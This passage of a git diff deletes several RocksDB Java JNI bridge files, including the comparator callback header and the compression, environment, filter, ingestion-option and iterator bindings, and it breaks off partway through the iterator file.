+++ /dev/null
@@ -1,94 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Comparator and rocksdb::DirectComparator.
-
-#ifndef JAVA_ROCKSJNI_COMPARATORJNICALLBACK_H_
-#define JAVA_ROCKSJNI_COMPARATORJNICALLBACK_H_
-
-#include <jni.h>
-#include <string>
-#include "rocksdb/comparator.h"
-#include "rocksdb/slice.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-struct ComparatorJniCallbackOptions {
-  // Use adaptive mutex, which spins in the user space before resorting
-  // to kernel. This could reduce context switch when the mutex is not
-  // heavily contended. However, if the mutex is hot, we could end up
-  // wasting spin time.
-  // Default: false
-  bool use_adaptive_mutex;
-
-  ComparatorJniCallbackOptions() : use_adaptive_mutex(false) {
-  }
-};
-
-/**
- * This class acts as a bridge between C++
- * and Java. The methods in this class will be
- * called back from the RocksDB storage engine (C++)
- * we then callback to the appropriate Java method
- * this enables Comparators to be implemented in Java.
- *
- * The design of this Comparator caches the Java Slice
- * objects that are used in the compare and findShortestSeparator
- * method callbacks. Instead of creating new objects for each callback
- * of those functions, by reuse via setHandle we are a lot
- * faster; Unfortunately this means that we have to
- * introduce independent locking in regions of each of those methods
- * via the mutexs mtx_compare and mtx_findShortestSeparator respectively
- */
-class BaseComparatorJniCallback : public Comparator {
- public:
-    BaseComparatorJniCallback(
-      JNIEnv* env, jobject jComparator,
-      const ComparatorJniCallbackOptions* copt);
-    virtual ~BaseComparatorJniCallback();
-    virtual const char* Name() const;
-    virtual int Compare(const Slice& a, const Slice& b) const;
-    virtual void FindShortestSeparator(
-      std::string* start, const Slice& limit) const;
-    virtual void FindShortSuccessor(std::string* key) const;
-
- private:
-    // used for synchronisation in compare method
-    port::Mutex* mtx_compare;
-    // used for synchronisation in findShortestSeparator method
-    port::Mutex* mtx_findShortestSeparator;
-    jobject m_jComparator;
-    std::string m_name;
-    jmethodID m_jCompareMethodId;
-    jmethodID m_jFindShortestSeparatorMethodId;
-    jmethodID m_jFindShortSuccessorMethodId;
-
- protected:
-    JavaVM* m_jvm;
-    jobject m_jSliceA;
-    jobject m_jSliceB;
-    jobject m_jSliceLimit;
-};
-
-class ComparatorJniCallback : public BaseComparatorJniCallback {
- public:
-      ComparatorJniCallback(
-        JNIEnv* env, jobject jComparator,
-        const ComparatorJniCallbackOptions* copt);
-      ~ComparatorJniCallback();
-};
-
-class DirectComparatorJniCallback : public BaseComparatorJniCallback {
- public:
-      DirectComparatorJniCallback(
-        JNIEnv* env, jobject jComparator,
-        const ComparatorJniCallbackOptions* copt);
-      ~DirectComparatorJniCallback();
-};
-}  // namespace rocksdb
-
-#endif  // JAVA_ROCKSJNI_COMPARATORJNICALLBACK_H_
diff --git a/thirdparty/rocksdb/java/rocksjni/compression_options.cc b/thirdparty/rocksdb/java/rocksjni/compression_options.cc
deleted file mode 100644
index 7d5af64..0000000
--- a/thirdparty/rocksdb/java/rocksjni/compression_options.cc
+++ /dev/null
@@ -1,121 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::CompressionOptions.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_CompressionOptions.h"
-#include "rocksdb/advanced_options.h"
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    newCompressionOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_CompressionOptions_newCompressionOptions(
-    JNIEnv* env, jclass jcls) {
-  const auto* opt = new rocksdb::CompressionOptions();
-  return reinterpret_cast<jlong>(opt);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    setWindowBits
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompressionOptions_setWindowBits(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jwindow_bits) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  opt->window_bits = static_cast<int>(jwindow_bits);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    windowBits
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompressionOptions_windowBits(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  return static_cast<jint>(opt->window_bits);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    setLevel
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompressionOptions_setLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jlevel) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  opt->level = static_cast<int>(jlevel);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    level
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompressionOptions_level(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  return static_cast<jint>(opt->level);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    setStrategy
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompressionOptions_setStrategy(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jstrategy) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  opt->strategy = static_cast<int>(jstrategy);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    strategy
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompressionOptions_strategy(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  return static_cast<jint>(opt->strategy);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    setMaxDictBytes
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompressionOptions_setMaxDictBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_dict_bytes) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  opt->max_dict_bytes = static_cast<int>(jmax_dict_bytes);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    maxDictBytes
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompressionOptions_maxDictBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  return static_cast<jint>(opt->max_dict_bytes);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_CompressionOptions_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  delete reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/env.cc b/thirdparty/rocksdb/java/rocksjni/env.cc
deleted file mode 100644
index dc949a0..0000000
--- a/thirdparty/rocksdb/java/rocksjni/env.cc
+++ /dev/null
@@ -1,81 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Env methods from Java side.
-
-#include "include/org_rocksdb_Env.h"
-#include "include/org_rocksdb_RocksEnv.h"
-#include "include/org_rocksdb_RocksMemEnv.h"
-#include "rocksdb/env.h"
-
-/*
- * Class:     org_rocksdb_Env
- * Method:    getDefaultEnvInternal
- * Signature: ()J
- */
-jlong Java_org_rocksdb_Env_getDefaultEnvInternal(
-    JNIEnv* env, jclass jclazz) {
-  return reinterpret_cast<jlong>(rocksdb::Env::Default());
-}
-
-/*
- * Class:     org_rocksdb_Env
- * Method:    setBackgroundThreads
- * Signature: (JII)V
- */
-void Java_org_rocksdb_Env_setBackgroundThreads(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint num, jint priority) {
-  auto* rocks_env = reinterpret_cast<rocksdb::Env*>(jhandle);
-  switch (priority) {
-    case org_rocksdb_Env_FLUSH_POOL:
-      rocks_env->SetBackgroundThreads(num, rocksdb::Env::Priority::LOW);
-      break;
-    case org_rocksdb_Env_COMPACTION_POOL:
-      rocks_env->SetBackgroundThreads(num, rocksdb::Env::Priority::HIGH);
-      break;
-  }
-}
-
-/*
- * Class:     org_rocksdb_sEnv
- * Method:    getThreadPoolQueueLen
- * Signature: (JI)I
- */
-jint Java_org_rocksdb_Env_getThreadPoolQueueLen(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint pool_id) {
-  auto* rocks_env = reinterpret_cast<rocksdb::Env*>(jhandle);
-  switch (pool_id) {
-    case org_rocksdb_RocksEnv_FLUSH_POOL:
-      return rocks_env->GetThreadPoolQueueLen(rocksdb::Env::Priority::LOW);
-    case org_rocksdb_RocksEnv_COMPACTION_POOL:
-      return rocks_env->GetThreadPoolQueueLen(rocksdb::Env::Priority::HIGH);
-  }
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_RocksMemEnv
- * Method:    createMemEnv
- * Signature: ()J
- */
-jlong Java_org_rocksdb_RocksMemEnv_createMemEnv(
-    JNIEnv* env, jclass jclazz) {
-  return reinterpret_cast<jlong>(rocksdb::NewMemEnv(
-      rocksdb::Env::Default()));
-}
-
-/*
- * Class:     org_rocksdb_RocksMemEnv
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksMemEnv_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* e = reinterpret_cast<rocksdb::Env*>(jhandle);
-  assert(e != nullptr);
-  delete e;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/env_options.cc b/thirdparty/rocksdb/java/rocksjni/env_options.cc
deleted file mode 100644
index 538b0b6..0000000
--- a/thirdparty/rocksdb/java/rocksjni/env_options.cc
+++ /dev/null
@@ -1,297 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling C++ rocksdb::EnvOptions methods
-// from Java side.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_EnvOptions.h"
-#include "rocksdb/env.h"
-
-#define ENV_OPTIONS_SET_BOOL(_jhandle, _opt)                \
-  reinterpret_cast<rocksdb::EnvOptions *>(_jhandle)->_opt = \
-      static_cast<bool>(_opt)
-
-#define ENV_OPTIONS_SET_SIZE_T(_jhandle, _opt)              \
-  reinterpret_cast<rocksdb::EnvOptions *>(_jhandle)->_opt = \
-      static_cast<size_t>(_opt)
-
-#define ENV_OPTIONS_SET_UINT64_T(_jhandle, _opt)            \
-  reinterpret_cast<rocksdb::EnvOptions *>(_jhandle)->_opt = \
-      static_cast<uint64_t>(_opt)
-
-#define ENV_OPTIONS_GET(_jhandle, _opt) \
-  reinterpret_cast<rocksdb::EnvOptions *>(_jhandle)->_opt
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    newEnvOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_EnvOptions_newEnvOptions(JNIEnv *env, jclass jcls) {
-  auto *env_opt = new rocksdb::EnvOptions();
-  return reinterpret_cast<jlong>(env_opt);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_EnvOptions_disposeInternal(JNIEnv *env, jobject jobj,
-                                                 jlong jhandle) {
-  auto* eo = reinterpret_cast<rocksdb::EnvOptions *>(jhandle);
-  assert(eo != nullptr);
-  delete eo;
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setUseDirectReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setUseDirectReads(JNIEnv *env, jobject jobj,
-                                                   jlong jhandle,
-                                                   jboolean use_direct_reads) {
-  ENV_OPTIONS_SET_BOOL(jhandle, use_direct_reads);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    useDirectReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_useDirectReads(JNIEnv *env, jobject jobj,
-                                                    jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, use_direct_reads);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setUseDirectWrites
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setUseDirectWrites(
-    JNIEnv *env, jobject jobj, jlong jhandle, jboolean use_direct_writes) {
-  ENV_OPTIONS_SET_BOOL(jhandle, use_direct_writes);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    useDirectWrites
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_useDirectWrites(JNIEnv *env, jobject jobj,
-                                                     jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, use_direct_writes);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setUseMmapReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setUseMmapReads(JNIEnv *env, jobject jobj,
-                                                 jlong jhandle,
-                                                 jboolean use_mmap_reads) {
-  ENV_OPTIONS_SET_BOOL(jhandle, use_mmap_reads);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    useMmapReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_useMmapReads(JNIEnv *env, jobject jobj,
-                                                  jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, use_mmap_reads);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setUseMmapWrites
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setUseMmapWrites(JNIEnv *env, jobject jobj,
-                                                  jlong jhandle,
-                                                  jboolean use_mmap_writes) {
-  ENV_OPTIONS_SET_BOOL(jhandle, use_mmap_writes);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    useMmapWrites
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_useMmapWrites(JNIEnv *env, jobject jobj,
-                                                   jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, use_mmap_writes);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setAllowFallocate
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setAllowFallocate(JNIEnv *env, jobject jobj,
-                                                   jlong jhandle,
-                                                   jboolean allow_fallocate) {
-  ENV_OPTIONS_SET_BOOL(jhandle, allow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    allowFallocate
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_allowFallocate(JNIEnv *env, jobject jobj,
-                                                    jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, allow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setSetFdCloexec
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setSetFdCloexec(JNIEnv *env, jobject jobj,
-                                                 jlong jhandle,
-                                                 jboolean set_fd_cloexec) {
-  ENV_OPTIONS_SET_BOOL(jhandle, set_fd_cloexec);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setFdCloexec
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_setFdCloexec(JNIEnv *env, jobject jobj,
-                                                  jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, set_fd_cloexec);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setBytesPerSync
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_EnvOptions_setBytesPerSync(JNIEnv *env, jobject jobj,
-                                                 jlong jhandle,
-                                                 jlong bytes_per_sync) {
-  ENV_OPTIONS_SET_UINT64_T(jhandle, bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    bytesPerSync
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_EnvOptions_bytesPerSync(JNIEnv *env, jobject jobj,
-                                               jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setFallocateWithKeepSize
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setFallocateWithKeepSize(
-    JNIEnv *env, jobject jobj, jlong jhandle,
-    jboolean fallocate_with_keep_size) {
-  ENV_OPTIONS_SET_BOOL(jhandle, fallocate_with_keep_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    fallocateWithKeepSize
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_fallocateWithKeepSize(JNIEnv *env,
-                                                           jobject jobj,
-                                                           jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, fallocate_with_keep_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setCompactionReadaheadSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_EnvOptions_setCompactionReadaheadSize(
-    JNIEnv *env, jobject jobj, jlong jhandle, jlong compaction_readahead_size) {
-  ENV_OPTIONS_SET_SIZE_T(jhandle, compaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    compactionReadaheadSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_EnvOptions_compactionReadaheadSize(JNIEnv *env,
-                                                          jobject jobj,
-                                                          jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, compaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setRandomAccessMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_EnvOptions_setRandomAccessMaxBufferSize(
-    JNIEnv *env, jobject jobj, jlong jhandle,
-    jlong random_access_max_buffer_size) {
-  ENV_OPTIONS_SET_SIZE_T(jhandle, random_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    randomAccessMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_EnvOptions_randomAccessMaxBufferSize(JNIEnv *env,
-                                                            jobject jobj,
-                                                            jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, random_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setWritableFileMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_EnvOptions_setWritableFileMaxBufferSize(
-    JNIEnv *env, jobject jobj, jlong jhandle,
-    jlong writable_file_max_buffer_size) {
-  ENV_OPTIONS_SET_SIZE_T(jhandle, writable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    writableFileMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_EnvOptions_writableFileMaxBufferSize(JNIEnv *env,
-                                                            jobject jobj,
-                                                            jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, writable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setRateLimiter
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_EnvOptions_setRateLimiter(JNIEnv *env, jobject jobj,
-                                                jlong jhandle,
-                                                jlong rl_handle) {
-  auto* sptr_rate_limiter =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(rl_handle);
-  auto* env_opt = reinterpret_cast<rocksdb::EnvOptions *>(jhandle);
-  env_opt->rate_limiter = sptr_rate_limiter->get();
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/filter.cc b/thirdparty/rocksdb/java/rocksjni/filter.cc
deleted file mode 100644
index 7b186b8..0000000
--- a/thirdparty/rocksdb/java/rocksjni/filter.cc
+++ /dev/null
@@ -1,43 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::FilterPolicy.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-
-#include "include/org_rocksdb_Filter.h"
-#include "include/org_rocksdb_BloomFilter.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/filter_policy.h"
-
-/*
- * Class:     org_rocksdb_BloomFilter
- * Method:    createBloomFilter
- * Signature: (IZ)J
- */
-jlong Java_org_rocksdb_BloomFilter_createNewBloomFilter(
-    JNIEnv* env, jclass jcls, jint bits_per_key,
-    jboolean use_block_base_builder) {
-  auto* sptr_filter =
-      new std::shared_ptr<const rocksdb::FilterPolicy>(
-          rocksdb::NewBloomFilterPolicy(bits_per_key, use_block_base_builder));
-  return reinterpret_cast<jlong>(sptr_filter);
-}
-
-/*
- * Class:     org_rocksdb_Filter
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_Filter_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* handle =
-      reinterpret_cast<std::shared_ptr<const rocksdb::FilterPolicy> *>(jhandle);
-  delete handle;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/ingest_external_file_options.cc b/thirdparty/rocksdb/java/rocksjni/ingest_external_file_options.cc
deleted file mode 100644
index 251a6e3..0000000
--- a/thirdparty/rocksdb/java/rocksjni/ingest_external_file_options.cc
+++ /dev/null
@@ -1,149 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::FilterPolicy.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_IngestExternalFileOptions.h"
-#include "rocksdb/options.h"
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    newIngestExternalFileOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_IngestExternalFileOptions_newIngestExternalFileOptions__(
-    JNIEnv* env, jclass jclazz) {
-  auto* options = new rocksdb::IngestExternalFileOptions();
-  return reinterpret_cast<jlong>(options);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    newIngestExternalFileOptions
- * Signature: (ZZZZ)J
- */
-jlong Java_org_rocksdb_IngestExternalFileOptions_newIngestExternalFileOptions__ZZZZ(
-    JNIEnv* env, jclass jcls, jboolean jmove_files,
-    jboolean jsnapshot_consistency, jboolean jallow_global_seqno,
-    jboolean jallow_blocking_flush) {
-  auto* options = new rocksdb::IngestExternalFileOptions();
-  options->move_files = static_cast<bool>(jmove_files);
-  options->snapshot_consistency = static_cast<bool>(jsnapshot_consistency);
-  options->allow_global_seqno = static_cast<bool>(jallow_global_seqno);
-  options->allow_blocking_flush = static_cast<bool>(jallow_blocking_flush);
-  return reinterpret_cast<jlong>(options);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    moveFiles
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_IngestExternalFileOptions_moveFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  return static_cast<jboolean>(options->move_files);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    setMoveFiles
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_IngestExternalFileOptions_setMoveFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jmove_files) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  options->move_files = static_cast<bool>(jmove_files);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    snapshotConsistency
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_IngestExternalFileOptions_snapshotConsistency(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  return static_cast<jboolean>(options->snapshot_consistency);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    setSnapshotConsistency
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_IngestExternalFileOptions_setSnapshotConsistency(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jsnapshot_consistency) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  options->snapshot_consistency = static_cast<bool>(jsnapshot_consistency);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    allowGlobalSeqNo
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_IngestExternalFileOptions_allowGlobalSeqNo(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  return static_cast<jboolean>(options->allow_global_seqno);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    setAllowGlobalSeqNo
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_IngestExternalFileOptions_setAllowGlobalSeqNo(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_global_seqno) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  options->allow_global_seqno = static_cast<bool>(jallow_global_seqno);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    allowBlockingFlush
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_IngestExternalFileOptions_allowBlockingFlush(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  return static_cast<jboolean>(options->allow_blocking_flush);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    setAllowBlockingFlush
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_IngestExternalFileOptions_setAllowBlockingFlush(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_blocking_flush) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  options->allow_blocking_flush = static_cast<bool>(jallow_blocking_flush);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_IngestExternalFileOptions_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  delete options;
-}
\ No newline at end of file
diff --git a/thirdparty/rocksdb/java/rocksjni/iterator.cc b/thirdparty/rocksdb/java/rocksjni/iterator.cc
deleted file mode 100644
index 3ac9d50..0000000
--- a/thirdparty/rocksdb/java/rocksjni/iterator.cc
+++ /dev/null
@@ -1,158 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Iterator methods from Java side.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-
-#include "include/org_rocksdb_RocksIterator.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/iterator.h"
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::Iterator*>(handle);
-  assert(it != nullptr);
-  delete it;
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    isValid0
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_RocksIterator_isValid0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<rocksdb::Iterator*>(handle)->Valid();
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    seekToFirst0
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_seekToFirst0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::Iterator*>(handle)->SeekToFirst();
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    seekToLast0
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_seekToLast0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::Iterator*>(handle)->SeekToLast();
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    next0
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_next0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::Iterator*>(handle)->Next();
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    prev0
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_prev0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::Iterator*>(handle)->Prev();
